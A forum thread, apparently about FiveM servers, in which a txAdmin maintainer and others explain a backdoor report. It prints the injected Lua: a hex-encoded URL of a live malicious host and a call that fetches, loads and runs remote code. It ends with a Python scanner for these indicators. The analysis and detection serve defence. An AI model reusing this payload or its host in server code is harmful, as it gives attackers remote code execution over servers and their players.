Backdoor while Installing FX-Server ESX with tx!

I don't know if it's supposed to be. If you install the newest fx-server and download esx during installation, it will install a backdoor. All my scripts are messed up. Every single client script was edited at the same time.
[link to site selling unauthorized and abusive products removed]

Installed again and again and again, and finally it came without the backdoor.


Hello, txAdmin maintainer here.

Thanks for reporting this, I just checked and here are my findings:

  1. After deploying it on my pc, I did not see the backdoor in that file.
  2. The ESX Legacy recipe has not been updated in the last week.
  3. The esx_taxijob was not updated in the last few days.
  4. If you kept installing it “again and again” I don’t see a reason why at any time it would change.

I am somewhat confident you just downloaded some backdoored resource that infected other resources, including esx_taxijob.


Probably an “anti-cheat”

No, they usually add a separate obfuscated file or load it from the anti-cheat resource; they have no need to add code directly to files like this. “Enchanced_Tabs” is part of some known malware (see here).

Generally happens when people download and run resources from untrustworthy (see here) sources (i.e. leaking communities, resellers) - then those people randomly go around blaming legitimate developers for their problems and telling people moronic garbage like
[image]

Running this function in a Lua compiler

```lua
local char = {
    '68', '74', '74', '70', '73', '3a', '2f', '2f', '63', '69', '70', '68', '65', '72',
    '2d', '70', '61', '6e', '65', '6c', '2e', '6d', '65', '2f', '5f', '69', '2f', '69',
    '3f', '74', '6f', '3d', '6c', '36', '54', '72', '32'
}

function str_utf8()
   _empt = ''

   for id,it in pairs(char) do
      _empt = _empt..it
   end

   return (_empt:gsub('..', function(cc)
       return string.char(tonumber(cc, 16))
   end))
end

print(str_utf8())
```

Outputs a link to cipher.

```lua
Enchanced_Tabs[10](str_utf8(), function(e, d)
    local s = Enchanced_Tabs[11](Enchanced_Tabs[13](d))
    if (d == nil) then return end
    s()
end)
```

Enchanced_Tabs[10] is PerformHttpRequest, Enchanced_Tabs[11] is assert, and Enchanced_Tabs[13] is load. Common remote execution garbage will fetch code (as a string) from cipher, compile with load, then execute.

More info at cipher/chapter-1-payload.md at 77a02baa19ccd34d6c3ac90b631415f494642f46 · ericstolly/cipher · GitHub
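For server owners checking whether their resources were modified this way, here is a scanner for the three indicators discussed in this thread (the `Enchanced_Tabs` name, a table of quoted hex bytes, and the `string.char(tonumber(cc, 16))` decode idiom). It is an added example, not part of the original posts or of txAdmin; the function names and the sample with its placeholder URL are constructed for illustration.

```python
import re
from pathlib import Path

MARKER = "Enchanced_Tabs"  # table name quoted in the thread, spelled as injected
PAIR = r"""['"][0-9a-fA-F]{2}['"]"""  # one quoted hex byte such as '68'
# Eight or more quoted hex bytes in a row, the shape of the `char` table above.
HEX_RUN = re.compile(rf"(?:{PAIR}\s*,\s*){{7,}}{PAIR}")
# The decode idiom from the thread: string.char(tonumber(cc, 16))
DECODE_IDIOM = re.compile(r"string\.char\s*\(\s*tonumber\s*\([^()]*,\s*16\s*\)")


def _line(text, pos):
    return text.count("\n", 0, pos) + 1


def scan_lua_source(text):
    """Return sorted (line, kind, detail) findings for one Lua source string."""
    hits = [(_line(text, m.start()), "marker", MARKER)
            for m in re.finditer(re.escape(MARKER), text)]
    hits += [(_line(text, m.start()), "hex-decode-idiom", "string.char(tonumber(.., 16))")
             for m in DECODE_IDIOM.finditer(text)]
    for m in HEX_RUN.finditer(text):
        raw = bytes(int(h, 16) for h in re.findall(r"[0-9a-fA-F]{2}", m.group(0)))
        decoded = raw.decode("ascii", errors="replace")
        is_url = decoded.lower().startswith(("http://", "https://"))
        hits.append((_line(text, m.start()),
                     "hex-encoded-url" if is_url else "hex-string-table", decoded))
    return sorted(hits)


def scan_tree(root):
    """Scan every .lua file under root; returns {path: findings} for files with hits."""
    report = {}
    for path in Path(root).rglob("*.lua"):
        hits = scan_lua_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report


def build_sample():
    """Constructed sample: same structure as the thread's code, placeholder URL."""
    hexes = ", ".join(f"'{b:02x}'" for b in b"https://example.invalid/p")
    return ("local t = { " + hexes + " }\n"
            "local function dec(s)\n"
            "  return (s:gsub('..', function(cc) return string.char(tonumber(cc, 16)) end))\n"
            "end\n"
            "Enchanced_Tabs[10](dec(table.concat(t)), function(e, d) end)\n")


if __name__ == "__main__":
    for finding in scan_lua_source(build_sample()):
        print(finding)
```

A hit is a lead for manual review rather than a verdict, since legitimate resources can also contain hex tables; `scan_tree` pointed at the server's resources folder lists the files to inspect first.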